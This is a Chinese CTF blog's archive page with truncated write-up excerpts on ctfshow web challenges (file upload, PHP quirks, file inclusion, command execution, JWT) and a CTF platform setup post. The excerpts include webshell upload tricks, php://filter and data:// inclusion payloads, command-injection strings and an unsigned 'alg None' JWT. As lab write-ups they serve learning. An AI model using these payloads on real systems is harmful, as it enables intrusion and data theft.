0raN9e的blog
  • 首页
  • 友链
  • 归档
  • 分类
  • 标签
  • 关于

ctfshow文件上传

web151 0x01 测试了一下需要png结尾,传个一句话木马上传之后bp抓包改为php,然后执行就行了,或者蚁剑 0x02 前端js进行修改,把对应的png改成php即可 web152 参照web151的0x01 web153 这题直接改结尾不能成功,尝试htaccess之后发现不行,查阅之后发现前者只适合apache,这里使.user.ini 12GIF89aauto_prepe
2024-09-20
每日一题
#文件上传

ctfshow-php特性

web89 1?num[]=a web90 0x01 1?num=4476.11 0x02 1?num=+4476 0x03 1?num=4476e1 0x04 1?num=0x117c web91 1?cmd=%0aphp web92 0x01 1?num=4476.11 0x02 1?num=4476e1 web92 0x01 1?num=4476.11 0x02 1
2024-09-17
每日一题
#php特性

ctfshow文件包含

前言:炒冷饭也不失一种乐趣。 web78 1?file=php://filter/convert.base64-encode/resource=flag.php web79 1?file=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4= 原理就是将`进行base64写进去执行 web80 0x01 1
2024-09-13
每日一题
#文件包含

ctfshow命令执行

前言:用了几天晚上时间把题目都过了一下,还是有值得学习的地方,炒冷饭也不失一种乐趣。web119-122的题目由于直接上传原文会对hexo的渲染模板可能造成模板注入,所以迫不得已上传的png web29 0x01 1?c=system("tac f*"); 0x02 1?c=echo `tac f*`; web30 1?c=echo `tac f*`; web31 1
2024-09-11
每日一题
#命令执行

ctfshow-jwt

题目 web345 打开查看页面源码提示/admin/,抓包看看有没有东西,发现是jwt,放jwt.io里看一下没有加密方式,那就是简单的base64进行转化,这里利用hackerbar进行发包 1{"alg":"None","typ":"jwt"}[{"iss":
2024-09-07
每日一题
#jwt

2019ciscn-ikun

题目 在线靶场 一个生成的网站,有提示需要买到Lv6,然后就没有然后了 分析 下面有很多Lv2-Lv5的,可以尝试写个脚本找到网页 点击图片看名称,src="/static/img/lv/lv3.png"写脚本爆一下看看哪页有lv6.png的内容 12345678import requestsurl = "http://c66eb3e7-b146-49bb-b9c
2024-09-04
每日一题
#jwt #pickle

XGCTF-Ezzz_php

题目 在线靶场 1234567891011121314151617181920212223242526272829303132 <?php highlight_file(__FILE__);error_reporting(0);function substrstr($data){ $start = mb_strpos($data, "["); $e
2024-09-03
每日一题
#serialize

2023ciscn-Unzip

前言:😋,看到好友包师傅每日一题,我也打算开个每日一题,记录一下内容。 题目 [在线靶场][https://ctf.show/challenges#Unzip-4002] 初始界面是一个文件上传,随手上传一个一句话木马,进入页面。 12345678910 <?phperror_reporting(0);highlight_file(__FILE__);$finfo = finfo_ope
2024-09-02
每日一题
#文件上传
记一次GZCTF搭建及动态容器

记一次GZCTF搭建及动态容器

前言:因为学校需要招新生要搭建平台,简单的学习了一下。 GZCTF配置 环境 ubuntu 22.04 第一步 更新源 1sudo apt update 第二步 安装docker和docker-compose 1sudo apt install docker.io docker-compose 中途按Y和Enter即可。 第三步 docker换源 由于docker今年在中国地区的限制,
2024-09-02
杂谈
#docker
nepctf2024复盘

nepctf2024复盘

Misc Nemophila 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566import base64print("这里有一个藏宝室,镇守着一个宝箱怪,当你说出正确的口令时,你也就快获得
2024-08-28
ctf
#ssti #Misc #serialize
1…45678

搜索

Hexo Fluid
载入天数... 载入时分秒...

本 blog 由 dkdun 支持

总访问量 次 总访客数 人